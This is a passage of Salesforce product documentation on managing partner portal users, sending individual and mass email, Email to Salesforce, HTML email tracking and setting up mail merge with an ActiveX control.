Some common tasks when managing your partner users include:

• Creating a partner account

• Creating partner users

• Disabling and deactivating partner users

• Assigning leads to partner users

• Assigning events to partner users

• Assigning cases to partner users

• Editing partner user information

• Tracking partner activity

• Giving partner users access to your knowledge base

• Enabling partner users to request meetings

In addition, here are some other ways you can work with your partner users:

Enable partner super user access

Partner super users have access to data owned by all partner users and partner super users in the same role and those
below them in the portal account hierarchy, even if the organization-wide default setting is Private. Partner super user
access applies to cases, leads, custom objects, and opportunities only.

Assign tasks to partner users

If your partner users have the appropriate field-level security settings, they can view and create activities related to leads
or opportunities.
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Add tasks to leads or opportunities to remind your partner users of particular tasks you would like them to perform. You
can view the activity history for a particular lead or opportunity, or use reports to track activities assigned to partner users.

Partner users can only assign tasks to other users in their partner account or to their channel manager.

Use notes and attachments to communicate with partner users

Partner users can create, view, and edit notes and add attachments from the Notes and Attachments related list on
selected detail pages, including lead, solution, and opportunity detail pages. You can use notes and attachments to share
documents or information with partner users. If Chatter is enabled for your organization, feed attachments are included
in the Notes and Attachments related list. Portal users can download feed attachments, but can’t preview, edit, or delete
them.

The size limit for an attached file is 5 MB.

Click Log in to Portal as User to troubleshoot

When you view the contact detail page for a partner user, you can click Manage External User, then Log in to Portal
as User. This opens a new browser window and logs you into the portal as the partner user. Click this button to
troubleshoot any issues partner users are experiencing. You may also click this button to ensure that your portal is
configured appropriately. The Log in to Portal as User button is only available if you have the “Manage External Users”
permission and one of the following: the “Modify All Data” permission or you are the partner account owner or higher
in the role hierarchy. The Log in to Portal as User button does not display if you do not meet these requirements, or if
the portal user is inactive.

Reset a partner user's password

When you view the user detail page for a partner user, you can click Reset Password to reset the partner user's password.

Partner users can reset their own password by clicking Forgot Password? on the partner portal login page.

Expose a solution in the portal

Select Visible in Self-Service Portal on the solution.

Add products to opportunities

If the Products related list is available to partner users on opportunities, then you can add products to the opportunities
for your partners.

See Also:
Managing Partner Users
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Assigning Leads to Partner Users
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on leadsTo assign leads to partners:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

A vital piece of partner relationship management is lead assignment. Your partners can only work with leads that are assigned
to them. There are two ways to handle lead assignment for partner users:

• Assign each lead to an individual partner user

• Assign leads to a lead queue and allow partner users to claim leads from the queue

In addition, you can create lead assignment rules that automatically assign leads to partner users or queues based on certain
properties of those leads.

Note:  Assignment rules cannot be triggered by actions in the portal.

Assigning a lead to a partner user or partner lead queue is just like assigning a lead to any other user or queue.

Leads assigned directly to a user or a queue that is not part of the lead pool are shown on the portal Leads tab. The partner
user can see these by selecting an appropriate list view. Until a partner user has reviewed a lead, it displays in bold, and is in
the My Unread Leads list view.

If a lead is assigned to a queue that is in the lead pool, the lead displays in the Available Leads list on the Home tab of the
portal.

Tip:  Assign partner leads to a single partner user (for example, a sales manager) in the partner account to enable that
person to manage lead assignment for the partner users in that account.
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Using Calendars in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Events”To assign events to partners:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

If you have added the calendar to the Home page layout for partner portal users, you can assign events to them, and partner
portal users with the “Edit Events” permission can create and edit their own events. Note that the following event and calendar
features are not supported in the partner portal: spell check, event updates, enhanced list views, drag-and-drop scheduling,
calendar sharing, and hover details.

Note:  A partner user can only see calendars shared by:

• Other partner users assigned to the same account

• The channel manager for their account

Assigning Cases in the Partner Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on cases

AND

“Transfer Cases” or “Transfer Record”

To assign cases to partners:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.
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Before you can assign cases to partner portal users, you must configure cases for partner users. In addition to the required user
permissions for this feature, you must have access to view the cases you’re updating.

To assign a case to a partner user:

1. On the case detail page, click [Change] next to the Case Owner field.
2. Select Partner User from the Owner drop-down list and enter the name of the partner user.
3. Optionally, select the Send Notification Email checkbox to send an email to the new owner.
4. Click Save.

The partner user will be able to view and edit the case from the partner portal.

Note:  Case comments added by partner portal users are public and can be viewed by any user that can view the case.

You can also create case assignment rules and escalation rules that automatically assign cases to partner users or queues based
on certain properties of those cases.

See Also:
Partner Portal Overview

About Mobile Access for Partner Users

Available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can enable your partner users to view and modify partner portal data on their BlackBerry®, iPhone®, Treo®, or Windows
Mobile® devices using the Salesforce Classic client application. By granting mobile access to your partner users, you provide
them with the flexibility to access their partner portal data from any location, at any time.

Due to memory and screen size limitations of mobile devices, Salesforce Classic uses data sets, or subsets of Salesforce data,
to determine the information that is available to mobile users. Partners using Salesforce Classic will only be allowed to view
objects they are able to view in the partner portal, even if Salesforce Classic is configured with data sets that are less restrictive.
Conversely, access to partner portal data can be limited by configuring more restrictive Salesforce Classic data sets.

See Also:
Partner Portal Overview
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SHARING INFORMATION WITH PARTNERS FAQS

Can I enable Salesforce for my Partners?
Yes, you can use Communities to connect with your partners and share appropriate Salesforce data.

You can customize communities to meet your business needs, including:

• Choosing which members from your company and which partners can join

• Selecting which Salesforce features to include

• Applying your company’s branding so that the community is recognizable

• Enabling your employees and partners to collaborate on Chatter and business processes (records)

• Enabling login options based on SAML for single sign-on for people outside your company

• Enabling users to self register for a community so that the administrator isn’t responsible for adding users

To get started using Communities, contact your Salesforce Account Executive.

Can I share my Salesforce data with other organizations
that also use Salesforce?

Yes.

Salesforce to Salesforce enables business collaboration both within and across Salesforce organizations. For example, you can
share lead and opportunity data with business partners and manage your entire pipeline and programs within Salesforce.
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USING SALESFORCE-INTEGRATED EMAIL

WORKING WITH SALESFORCE EMAIL

Email Overview
Available in: All Editions except Database.com

Mass email not available in: Personal, Contact Manager, and Group Editions

There’s no limit on sending individual emails to contacts, leads, person accounts, and users in your organization directly from
account, contact, lead, opportunity, case, campaign, or custom object pages.

With mass email in Professional, Enterprise, Unlimited, and Developer Edition organizations, you can email a list of contacts,
leads, or person accounts for small-scale sales or support. Mass email is intended to facilitate your business processes, not
replace your existing email application or handle mass-marketing campaigns.

Using the API or Apex, you can send single emails to a maximum of 1,000 external email addresses per day based on Greenwich
Mean Time (GMT). Single emails sent using the Salesforce application don't count toward this limit. There’s no limit on
sending individual emails to contacts, leads, person accounts, and users in your organization directly from account, contact,
lead, opportunity, case, campaign, or custom object pages.

You can send mass email to a maximum of 1,000 external email addresses per day per organization based on Greenwich Mean
Time (GMT). The maximum number of external addresses you can include in each mass email depends on your edition:

External Address Limit per Mass EmailEdition

Mass email not availablePersonal, Contact Manager, and Group Editions

250Professional Edition

500Enterprise Edition

1,000Unlimited Edition

Note:  Note the following about email limits:

• The single and mass email limits don't take unique addresses into account. For example, if you have
johndoe@example.com in your email 10 times, that counts as 10 against the limit.

• You can send an unlimited amount of email to your organization’s internal users, which includes portal users.

• In Developer Edition organizations and organizations evaluating Salesforce during a trial period, your organization
can send mass email to no more than 10 external email addresses per day. This lower limit does not apply if your
organization was created before the Winter '12 release and already had mass email enabled with a higher limit.
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When you send an email, you can choose a predefined template for the message. To personalize your message, the template
can include merge fields that are replaced with information from the Salesforce record when the email is sent. For instance,
your organization may want to use a standard template to communicate solution information to customers with cases. Your
administrator maintains organization-wide templates, and you can maintain your own personal templates.

See Also:
Editing Email Settings
Force.com Connect for Microsoft Outlook Overview

Mass Email Status Messages
Available in: Professional, Enterprise, and Unlimited Editions

If you're configured to receive email notifications for mass emails, you'll see an auto-generated status email from Salesforce
for each mass email you send. The subject line of the status email contains the value you entered in the Mass Email Name
field when sending the mass email.

The status message shows the number of recipients that the mass email was both addressed and sent to. These numbers may
differ because:

• The mass email would cause your organization to exceed its daily mass email limit. Salesforce does not send the message
to any of the intended recipients in this case.

• One or more selected recipients opted out of receiving mass email after the mass email was scheduled but before it was
processed.

• One or more selected recipient email addresses were removed from the contact or lead after the mass email was scheduled
but before it was processed.

• The user who sent the mass email was deactivated after the mass email was scheduled but before it was processed. Salesforce
does not send mass emails scheduled by a user who is deactivated.

To turn on the notification option, click Email Administration > Deliverability, and select Notify sender when mass
email completes.

See Also:
Guidelines on Sending Mass Email
Configuring Deliverability Settings

Guidelines on Using Email to Salesforce
Available in: All Editions except Database.com

If you use a company-provided or third-party email account, you can use Email to Salesforce to assign emails to leads, contacts,
opportunities, and other records in Salesforce. When composing, forwarding, or replying to email, simply enter your Email
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to Salesforce address in the BCC field or any recipient field. Salesforce receives a copy of the email and, depending on your
configuration, adds it to either the Activity History related list of the matching records or to the My Unresolved Items page,
where you can manually assign it.

Tips

• An administrator must activate Email to Salesforce for your organization. After activation, Salesforce generates a unique
Email to Salesforce address for each user. Users receive an automated email from Salesforce that contains their Email to
Salesforce address. Users can view their Email to Salesforce address in their personal settings under Email > My Email to
Salesforce. The Email to Salesforce address is automatically generated and cannot be changed.

• You can also save a message as an email activity without sending or resending it to another person. Simply forward the
email with your Email to Salesforce address in the To field. Be sure that there are no other email address in the To, CC,
and BCC fields. Salesforce receives a copy of the email and searches the From, To, and CC fields in the forwarded email
for the email addresses of your leads and contacts. If any leads or contacts are found, Salesforce saves the email in the
Activity History related list on the appropriate record.

• When you use Email to Salesforce to save a message as an email activity, the default task type is specified by the Send
Email Default setting. You can change the default value by editing the Task Type picklist field.

• You don't need to configure Email to Salesforce to associate emails to matching records. Salesforce searches emails sent
to your Email to Salesforce address for a record ID, then looks for the record. If related records are found, Salesforce adds
the email to either the Activity History related list on those records or to the My Unresolved Items page, where you can
manually assign them.

Notes

• You can use Email to Salesforce with email client applications such as IBM® Lotus Notes® and Microsoft® Outlook®, as
well as webmail such as Gmail® and Yahoo! Mail®.

• The email addresses you use to send email to Salesforce must be configured in the My Acceptable Email Addresses
field in the My Email to Salesforce setup page.

• Email to Salesforce attempts to match the email address found in the To or CC fields with the one in the Email standard
field. It doesn't support matching on custom email fields.

• The maximum number of email addresses that Email to Salesforce can match is 50. If the combined number of addresses
in the To and CC fields exceeds this limit, Email to Salesforce processes only the first 50 unique addresses in the email.

• If Email to Salesforce matches an email address to multiple lead or contact records in Salesforce, you can choose to associate
the email with all matching records, the oldest record, or the record with the most activity.

• If Email to Salesforce matches an email to multiple opportunity records in Salesforce, the email is included in the activity
history on all matching open records.

• If you configure Email to Salesforce to associate emails to matching leads or contacts, Salesforce searches the To and CC
fields for the email addresses of your leads or contacts. If any leads or contacts are found, Salesforce saves the email to the
Activity History related list on the appropriate record.

• If you configure Email to Salesforce to associate emails to matching opportunities, Salesforce searches the To and CC
fields for the email addresses of your contacts. If contacts are found, Salesforce saves the email to the Activity History
related list on all open opportunities, as long as the contact is assigned a contact role on the opportunity. For example, the
contact may be assigned the role of Decision Maker on an opportunity.

• Email to Salesforce can create a maximum of 50 email activities for each email it receives. It can relate up to 50 contacts
to each email task record.

• The size limit for an attached file is 5 MB when attached directly to the related list. The size limit for all files attached to
an email is 10 MB. For each matching record, all attachments sent with the email are duplicated, which affects your data
size limit. Any attachments that aren't added are listed in the confirmation email you receive from Salesforce.

• Email text and HTML is automatically truncated to 32 KB.
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• Email to Salesforce is required to use the Add Email feature with Salesforce for Outlook. Disabling one feature will
automatically disable the other. With Salesforce for Outlook, you add emails using the Add Email and Send and Add
toolbar buttons instead of the BCC field.

• If Salesforce can’t match any email addresses for recipients that appear in the To and Cc fields of emails you add to
Salesforce, the My Unresolved Items page displays one row for each email.

See Also:
Setting Up Email to Salesforce
Adding Email with Email to Salesforce

Setting Up Email to Salesforce
Available in: All Editions except Database.com

Before you can use your Email to Salesforce address, you must configure it.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left side of the page, select Email > My Email to Salesforce.
3. Enter email addresses you’ll use to send email in My Acceptable Email Addresses. Separate multiple email addresses

with commas.

Important:  Your Email to Salesforce address accepts only email from addresses you enter. If you don’t enter any
email addresses, email sent to your Email to Salesforce address won’t be associated to any records.

4. Choose whether you’d like either all emails to be sent to My Unresolved Items so you can manually assign them to related
records, or to have Salesforce first try to automatically assign them.

5. Configure Email to Salesforce to add emails as activities to matching opportunities, leads, contacts, or all three.
6. If you selected leads or contacts, choose how Email to Salesforce should process emails containing lead or contact information

that matches duplicate records. Email to Salesforce can add the email activity to either all matching records, the oldest
duplicate record, or the record that has greatest number of activities.

7. If you selected leads or contacts, you can select If no matching records are found, create a task and
send it to My Unresolved Items to have the email sent to My Unresolved Items if no matching records are found.
If this checkbox isn’t selected and Salesforce can’t identify the email addresses in the To or From fields, the email won't
be saved in Salesforce.

8. Select Always save email attachments to save attachments on emails sent to Salesforce. The size limit for an
attached file is 5 MB when attached directly to the related list. The size limit for all files attached to an email is 10 MB.

9. If you want to receive a confirmation email when emails are successfully associated, select Email me confirmation
of association.

10. Enter email domains you want to exclude from automatic association in Excluded Domains. Separate multiple email
domains with commas.

Emails coming from these excluded domains go to My Unresolved Items. From there, you can choose to either manually
assign them, or leave them unassigned.

11. Click Save.

1263

Setting Up Email to SalesforceWorking with Salesforce Email



Tip:  Easily retrieve your Email to Salesforce address by adding it to the address book of your email program.

See Also:
Adding Email with Email to Salesforce

Adding Email with Email to Salesforce
Available in: All Editions except Database.com

You can add emails to matching leads, contacts, or opportunities.

1. Compose an email from a third-party email account that you designate in My Acceptable Email Addresses on the
My Email to Salesforce setup page.

2. Enter your Email to Salesforce address in the BCC field of your email.
3. Enter desired recipients in the To, CC, and BCC fields.
4. Send the email. Salesforce receives the emails and, based on your My Email to Salesforce settings, adds them to either the

Activity History related list of matching records or the My Unresolved Items page, where you can manually assign them.
Unresolved emails also appear in your open task list.

You can add emails to specific Salesforce records.

1. Compose an email from a third-party email account that you designated in My Acceptable Email Addresses on
the My Email to Salesforce setup page.

2. In Salesforce, locate the record ID of the record with which you want the email associated. The record ID is the 15-digit,
case-sensitive, alphanumeric code that displays at the end of the URL for a record. For example, if you view the detail page
of a campaign record, the URL will look similar to this: https://na1.salesforce.com/701D0000000HQZy; the
record ID for this record is 701D0000000HQZy.

3. In the subject line or body of the email, type ref: followed by the record ID. For example: ref: 701D0000000HQZy.

Note:  Record IDs can either be typed on a separate line or within the email body text if surrounded by (), [], or
{}. For example: (ref: 701D0000000HQZy). Multiple record IDs must be separated with commas, for
example: ref: 701D0000000HQZy, 801D0000000IRAz, 901D0000000JSBa.

4. Enter your Email to Salesforce address in the To, CC, or BCC fields of your email.
5. Optionally enter additional recipients in the To, CC, or BCC fields.
6. Send the email.

Salesforce receives the emails and adds them to the Activity History related list for each record that matches a record ID
specified in the email. Invalid IDs or IDs for records that you do not have read access to are ignored.

If Email to Salesforce is configured to associate email with matching leads, contacts, or opportunities, an unresolved task
is created when an email is associated to a lead, contact, or opportunity using only a record ID and not a matching email
address. For example, if you have configured emails to be associated with matching leads and you send an email directly
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to your Email to Salesforce address with a lead record ID in the body or subject line of the email, the email is associated
to the lead and an unresolved task is created.

See Also:
Setting Up Email to Salesforce

Sending Email
Available in: All Editions except Database.com

User Permissions Needed

“Send Email”To send emails:

“Modify all Data”To create an organization-wide address:

To send email to a contact, lead, person account, or other user:

1. Click Send An Email on the Activity History related list of a record. Or, from a case, click Send An Email or Reply from
the Email related list. This option is available only to organizations using Email-to-Case or On-Demand Email-to-Case.

2. Optionally, specify the sending address of the email from the From drop-down list for emails associated with Email-to-Case
or On-Demand Email-to-Case; or if the email name or email address in your email settings is different from the email
name or email address on your user record.

When creating a new outbound Email-to-Case or On-Demand Email-to-Case message, the From address is auto-populated
with your name. When replying to an inbound message, the From address is auto-populated with the routing address to
which the email was sent.

If you previously defined any organization-wide addresses, the email addresses associated with your user profile also appear
in this drop-down list. Organization-wide addresses are not available for Mass Email, or Stay-in-Touch requests.

3. If you want to remove any HTML formatting and send a text email, click Switch to Text-Only. Click Switch to HTML
to use HTML formatting or to track the email.

4. Enter a contact, lead, or person account in the To: field. Only one name can be entered in the To: field. For contacts and
leads that have multiple email fields, you can select an email address.

5. Optionally, choose another record, such as an account, case, or custom object, to associate with the email.
6. Optionally, if you want other people to receive the email as primary recipients, enter email addresses in the Additional

To: field, or click the Additional To: link to select individuals from a list. These people do not need to be Salesforce
records. Email addresses can be separated by semicolons, commas, spaces, or new lines.

7. In the CC: and BCC: fields, enter any additional email addresses, or click the CC or BCC link to select individuals from
a list. Email addresses can be separated by semicolons, commas, spaces, or new lines.

If your organization has enabled compliance BCC emails, the BCC: field is not available and your Automatic Bcc setting
under My Email Settings is disabled.
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8. Enter a subject and body for the email, or click Select Template to choose a predefined email template. Choose a folder
and select a template from the folder. If necessary, you can modify the content of the template in your email; however, you
cannot modify Custom templates.

Warning:  If you modify the template contents, your changes affect only the HTML version of the email template.
The changes are not reflected in the text-only version of the email sent to recipients.

When replying to an Email-to-Case or On-Demand Email-to-Case email, the original email is included in the email
body. All or parts of this email can be deleted.

9. If you chose an HTML email template, use the format toolbar to format your text. For more information, see Using the
Format Toolbar. Available in Professional, Enterprise, Unlimited, and Developer Editions only.

10. Optionally, select Attach File to add a file. You can attach multiple files as long as the total size of all attached files does
not exceed 10 MB.

11. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the body of the email. Spell Checker
does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support Thai, Russian,
and double-byte languages, such as Japanese, Korean, or Chinese.

If you are using an email template, the Check Spelling button is available for text templates and Visualforce templates
without HTML tags.

12. Click Send.

If the recipient does not have an email address, Salesforce prompts you to edit the person’s email address and click:

• Save Address to add the email address to the record without sending the email.
• Save Address and Send to add the email address to the record and send the email.

See Also:
Guidelines on Sending Email
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Sending Mass Email
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Mass Email"To send mass emails to contacts, person accounts, or leads:

"Mass Email"

AND

"Manage Users"

To send mass emails to users:

"Mass Email"

AND

"Edit Tasks"

To send mass emails and log them in the Activity History
related list:

Watch a Demo: Sending Mass Email (4:31 minutes)

You can send a mass email message to a recipient list that consists of contacts, leads, person accounts, or users you can view
in Salesforce.

1. Choose the type of recipients for your mass email:

• To send mass email to contacts or person accounts, click Mass Email Contacts in the Tools section at the bottom of
the Contacts or Cases tabs. If your organization uses person accounts, the link is also in the Tools section at the bottom
of the Accounts tab.

• To send mass email to leads, click Mass Email Leads in the Tools section at the bottom of the Leads tab.
• To send mass email to users, from Setup, click Manage Users > Mass Email Users. This link is available to administrators

and users with the “Manage Users” permission.

2. Select a list view of recipients and click Go!. By default, the My Contacts, My Leads, Active Users, or My Cases views
include all records of that type with an email address. To change the list of recipients, create a new custom view.

Contacts, leads, or person accounts that have the Email Opt Out field selected or do not have an email address are not
included in any email list views. Person accounts are included in contact list views.

3. All recipients in the list view are selected by default. Remove recipients who shouldn't receive the mass email by deselecting
them or using the top checkbox in the list view to select or deselect all of the recipients listed on the page.

4. Click Next.
5. Choose an email template.

Note: You can’t send a mass email using a Visualforce email template.
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6. Optionally, click the Preview links to view the templates. In the email template preview window, the template displays
with any merge fields included, such as {!Account.AccountNumber}. When you send your email, data from the
recipients' records, or any applicable substitute text, is inserted into the email in place of those merge fields.

7. Click Next.
8. On the confirmation page, select from the available Processing Options:

• BCC me on one message

• Store an activity for each message

The Activity History item is associated with the contact, lead, or person account and displays as “Mass Email:<Template
Description>.” The email subject, body, and attachments are not stored in the Activity History item. To log Activity
History items, you must have access to view or edit the records in the recipient list and have the “Edit Task” permission.

• Use my signature

Optionally, include your email signature in this mass email. This option applies to text emails only.

• Mass Email Name

Enter a name you can use to identify this mass email in the mass email queue.

Note:  The mass email name only appears in the mass email queue and status messages you receive from
Salesforce. Salesforce doesn't add the mass email name to the mass email you're sending.

9. In the Delivery Options section, do one of the following.

• Select Send now.
• Select Schedule for delivery on and click in the date field to specify when Salesforce will send the mass email. Use the

adjacent drop-down menu to specify the time zone.

Note:  From their personal settings, users can select Email > My Mass Emails to view and cancel mass emails
they scheduled. From Setup, administrators can select Monitoring > Mass Email to view and cancel mass
emails scheduled by all users in their organization.

10. Click Send to submit the mass email.
11. Click Finished to complete the mass email wizard.

See Also:
Guidelines on Sending Mass Email
Mass Email Status Messages

Guidelines on Sending Email
Available in: All Editions except Database.com

Note the following when sending email.
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Tips

• If bounce management is activated and the email bounces, Salesforce displays an error message. Click the link in the error
message to update the email address and optionally send the email to the updated address.

• You can send emails related to any record, as long as you have access to view or edit the record.

Notes

• An attachment is sent as a link if its total size is 3 MB or more or if it is sent using mass email. When recipients click the
attachment link in the email, the attachment opens in a separate Web browser, and they can download the file. Attachments
sent as links are stored for 30 days.

• Attachments aren't stored on emails sent from Salesforce. To be saved with the email, attachments must be either associated
with the email later or sent to Salesforce using using Email-to-Case, Email-to-Salesforce, On-Demand Email-to-Case,
or Salesforce for Outlook.

• Emails sent via the Send an Email button are listed in the Activity History list of the related records. The Activity History
item is titled “Email: Subject.” You can click the email subject to view the body of the email.

• Emails sent from the Email related list of a case are saved in the Email related list. This functionality is only available for
organizations with Email-to-Case or On-Demand Email-to-Case enabled.

• If your page layout or field-level security settings prevent you from viewing a field, that field won't be available for email
templates.

See Also:
Sending Email
Sending Mass Email

Guidelines on Sending Mass Email
Available in: Professional, Enterprise, Unlimited, and Developer Editions

When sending mass email, note the following.

Tips

• Before you send a mass email, create a custom view of contacts, leads, person accounts, or cases without an email address.
In the search criteria, choose “Email equals,” and leave the third field blank. You can then update those records before
sending your emails. Unfortunately, there is no way to validate an email address without sending an actual email message.

• If your template contains a merge field for which there is no data in a particular record, that field does not appear in the
email you send. To find such blank fields, modify your recipient list view to search for the merge fields you are using in
your template, and enter the criterion “<field> equals,” leaving the third field blank. Edit those records that have blank
fields before you send your emails.

• You can send a mass email to a recipient list that consists of contacts, leads, person accounts, or users you can view in
Salesforce.
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Notes

• If the email deliverability option Notify sender when mass email completes is selected, you receive an
auto-generated status email from Salesforce for each mass email you send. The subject line of the status email contains the
value you entered in the Mass Email Name field when sending the mass email.

• Attachments in mass emails are sent as links rather than as physical files. When recipients click the attachment link in the
email, the attachment opens in a separate Web browser, and they can download the file. Attachments sent as links are
stored for 30 days.

Limitations

• Mass email can only be sent to an address in a standard email field. Mass email using a custom email field is not supported.
• If a standard email field is hidden by field-level security, the Mass Email links for contacts and leads don't appear.
• Email templates give you access only to the fields that are accessible to you via your page layout and field-level security

settings. (Field-level security is available in Enterprise, Unlimited, and Developer Editions only.)

See Also:
Sending Mass Email
Configuring Deliverability Settings

Tracking HTML Email
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

After sending an HTML email, you can track the date it was first opened, the number of times it was opened, and the date
it was most recently opened.

Detail pages for contacts, leads, and person accounts include an HTML Email Status related list. Each email you send to a
person or mass distribution list is listed, including the date the email was sent, first opened, last opened, and the total number
of times it was opened by all users (multiple openings by the same user are counted). This list also includes automatic emails
such as those sent through Web-to-Lead and Web-to-Case response rules.

• Click Send An Email to create a new message. See Sending Email on page 1268 for more details on sending an email.

• Click View All to view more details about all the items in the HTML Email Status related list.

• Click Edit next to an email to add any notes to it.

• Click Del to remove an email from the HTML Email Status related list.

• Click the subject of an email to view the entire email message. If the subject is longer than 100 characters, it is truncated
with ellipses (...).

To report on the HTML email statistics listed in the HTML Email Status related list, use the HTML Email Status Report
available from the Reports tab.

Note:  Add the HTML Email Status related list to your contact, lead, and person account page layouts before users
send HTML emails that they need to track.
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Resolving Your Unassigned Emails
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on tasks and “Read” on the objects you assign to the
email

AND

Email to Salesforce

OR

Add Email in Salesforce for Outlook and Email to Salesforce

To view or edit unresolved emails:

“Edit” on tasks

AND

“Show Quick Create” and “Create” on those objects

To create new Salesforce records:

“Lookup Auto-Completion” in Search SettingsTo see recently used data in the related records fields:

When emails are sent to Salesforce using Email to Salesforce or Salesforce for Outlook, some are automatically assigned to
related records based on your Email to Salesforce settings. The rest are added to My Unresolved Items, where you can either
assign them to related Salesforce records or confirm that you want to leave them unassigned.

1. Access your unresolved emails from the sidebar shortcut Unresolved Items.
2. Depending on how you want to resolve an email, choose either of these actions.

• Assign to related records—Enter a related record in one or both fields. If you need to, first select the correct record
type from the drop-down list. If you assign a lead, you can't assign additional records. Clear an entry to cancel an
assignment.

• Leave unassigned—Click Don't Assign. The text Unresolved Email: is removed from the subject line and the
email is assigned to you as a completed task. If the task's Status picklist includes more than one “completed” status,
we use the first one.

3. Click Save to save your changes. All modified items are removed from the list. You can return any time to resolve remaining
items. Clicking Cancel cancels all changes on the page. The email is added to the Activity History or Open Activities
related list of the associated records.

Tips

• Unresolved emails also appear in your open task list. You can resolve an email from the email's task record by assigning it
to other Salesforce records. Assigned and completed emails are automatically removed from your unresolved emails and
open task lists.

• Click  next to an email to see its details.
• Click Email to Salesforce Settings to view your email assignment settings.
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Email Fields
Available in: All Editions

A Salesforce outbound email has the following fields, listed in alphabetical order.

DescriptionField

List of the attached files. The maximum total size of all email
attachments is 10 MB.

Attachment

List of email addresses to which the email will be blind carbon
copied. Up to 2000 characters are allowed in this field. You

BCC

can separate email addresses by semi-colons, commas, spaces,
or new lines. Emails with addresses that contain parentheses,
such as john(smith)@acme.com, will not be sent.

The BCC: field is not available if your organization has enabled
compliance BCC emails.

Main text of the email. Up to 384 KB of data are allowed in
this field.

Body

List of email addresses to which the email will be copied. Up
to 2000 characters are allowed in this field. You can separate

CC

email addresses by semi-colons, commas, spaces, or new lines.
Emails with addresses that contain parentheses, such as
john(smith)@acme.com, will not be sent.

Automatically generated field containing your email address.From

Existing account, asset, campaign, case, contract, opportunity,
product, solution, or custom object that the email is related

Related To

to. This field is not sent with the email, but is stored in the
Activity History with the email.

Your personalized tag line. Set your signature by going to your
personal settings and selecting Email > My Email Settings.

Signature

It is automatically appended to individual emails. You can
choose to append it to mass emails.

Subject of the email. Up to 80 characters are allowed in this
field. The contents of this field display in bold if the email
Status is New.

Subject

Name of the contact, lead, or person account to which the
email will be sent. Only one name can be entered in this field.

To
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USING SALESFORCE-INTEGRATED EMAIL FAQS

Can I use Salesforce to send mass emails?
If you want to send mass marketing emails, we suggest using a third-party application in the AppExchange that allows you
to centrally manage email campaigns and track the responses back to Salesforce. This allows your marketing team to track the
number of qualified leads and ROI for their email campaigns.

If you want to send mass sales emails, in Salesforce click Contacts. Then, choose Tools > Mass Email Contacts, and follow
the Mass Email wizard.

See Also:
General Importing Questions
Sending Mass Email
Can I use Salesforce to send HTML emails?

Can I use Salesforce to send HTML emails?
Yes, you can use Salesforce to send HTML emails to contacts, leads, person accounts, and users in your organization. You
can send emails to individuals, send mass emails to multiple contacts, and set up templates for HTML emails you send
frequently.

See Also:
General Importing Questions
Sending Email

GENERATING FORM LETTERS WITH TEMPLATES

Mail Merge Overview
Available in: All Editions except Database.com

A mail merge is the process of generating form letters and other Microsoft® Word documents that are personalized for the
recipient, who is often a contact or lead. The content of each document is predefined in a mail merge template. Mail merge
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templates include variables called merge fields where data from your Salesforce records—for example a contact's name and
address—displays in the generated document.

Generating Single Mail Merge Documents

To generate a Microsoft Word document for an individual record, open the record’s detail page and click Mail Merge on the
Activity History related list.

Note:

Standard mail merge requires:

• Microsoft® Internet Explorer® versions 7, 8, 9, and 10 (We don’t support Google Chrome Frame™ plug-in for
Internet Explorer because the ActiveX controls required for mail merge are supported in Internet Explorer only.)

• Microsoft Word 2003 or 2007
• Microsoft Windows® XP and Windows Vista® (32-bit only)

Generating Mass Mail Merge Documents

To generate Microsoft Word documents for multiple records, such as when sending a mass mailing, see the Salesforce Bulk
Mail Merge Process document.

Alternatively, if Extended Mail Merge has been enabled for your organization you can easily generate mail merge
documents—such as form letters with matching envelopes and address labels—for multiple records at the same time.

See Also:
Installing the Mail Merge ActiveX Control
Generating Mass Mail Merge Documents with Extended Mail Merge
Sending Single Mail Merge Documents

Installing the Mail Merge ActiveX Control
Available in: All Editions except Database.com

With standard mail merge, the first time you generate a mail merge document you must install an ActiveX control that helps
Salesforce communicate with Word. You must be logged in as a Windows user with sufficient administrative privileges to
download ActiveX controls. If you are unable to download ActiveX controls, contact your IT department or Windows system
administrator for assistance.

Standard mail merge requires:

• Microsoft® Internet Explorer® versions 7, 8, 9, and 10 (We don’t support Google Chrome Frame™ plug-in for Internet
Explorer because the ActiveX controls required for mail merge are supported in Internet Explorer only.)

• Microsoft Word 2003 or 2007

• Microsoft Windows® XP and Windows Vista® (32-bit only)

Configure your Web browser to accept ActiveX controls as follows:

1. Click Tools > Internet Options to open the Internet Options dialog.
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2. Go to the Security tab.
3. Click the icon for the Internet zone, then click Custom level.
4. In the “ActiveX controls and plug-ins” section, select Enable or Prompt for the following settings: “Download signed

ActiveX controls,” “Run ActiveX controls and plug-ins,” and “Script ActiveX controls marked safe for scripting.”
5. In the “Downloads” section, select Enable for the “File download” setting.
6. Click OK.
7. Repeat the custom level settings above for the Trusted sites zone.
8. Ensure that salesforce.com is a trusted site by clicking the Sites button and looking for https://*.salesforce.com

